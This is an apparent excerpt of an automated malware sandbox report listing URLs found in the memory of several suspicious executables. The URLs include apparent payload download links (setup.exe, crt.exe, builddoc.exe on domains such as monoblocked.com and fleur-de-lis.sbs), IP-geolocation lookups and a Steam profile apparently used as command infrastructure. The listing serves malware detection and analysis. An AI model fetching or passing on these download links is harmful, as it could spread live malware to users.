00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.175
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.175o
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.175
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.vk.com
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: CHA0VZiz8y.exe, CHA0VZiz8y.exe, 00000000.00000003.2144743645.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2189147343.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2159189354.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2144949802.00000000043D0000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2166181794.00000000043F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://f.123654987.xyz/525403/setup.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2159189354.00000000043F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://f.123654987.xyz/525403/setup.exeU
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/2
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2126859074.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2125562023.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2125970270.00000000043C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/jhgfd
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/jhgfdD
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/jhgfdx
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/post/File_294/setup294.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/post/File_294/setup294.exer
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/p~
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/r
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/xe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fleur-de-lis.sbs/z
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/?
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2412636025.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2613733095.000000000063D000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2052702628.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/namehttps://ipgeolocation.io/status
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.175
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.175P
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.175X
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.175_
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.175c
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/dll/builddoc.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2140216516.00000000043F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/dll/builddoc.exee
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/dll/builddoc.exersaenh.dll
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/f
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer/n
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer:80/dll/builddoc.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kurd.computer:80/dll/builddoc.exeu
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.vk.com/
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.vk.com/?act=login
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.vk.com/?act=logout&hash=b3a96a5acc0a409d0f&_origin=https%3A%2F%2Fvk.com&lrt=BDpxh3TFcr
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/R
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134495582.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189147343.00000000043F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exee-
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com:80/ssl/crt.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/
                      Source: CHA0VZiz8y.exe, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134495582.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2144743645.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2189147343.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2140216516.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2159189354.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138181954.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2166181794.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exe&
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exeV
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exexe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exexer
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com:80/525403/setup.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com:80/525403/setup.exe1
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com:80/525403/setup.exer
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://papi.vk.com/pushsse/ruim
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2164957983.00000000065E5000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2165595509.0000000006B12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/base.3a6f1d6d.css
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/common.cb94d05c.css
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/fonts_cnt_async.4881739c.css
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/fonts_utf.7fa94ada.css
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/vkui.c63ec9ec.css
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/fonts/VKSansDisplayDemiBoldFaux.v100.woff2
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stats.vk-portal.net
                      Source: ogoGQsWFwF_EcodN5qF7hiVC.exe, 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmp, zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2337447194.0000000004510000.00000004.00001000.00020000.00000000.sdmp, zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2317913229.0000000002260000.00000040.00001000.00020000.00000000.sdmp, zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189316455.00000000043C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sun6-21.userapi.com/c909228/u863235369/docs/d41/b0e46f4b18c5/crypted.bmp?extra=9HEKPrTuifgfj
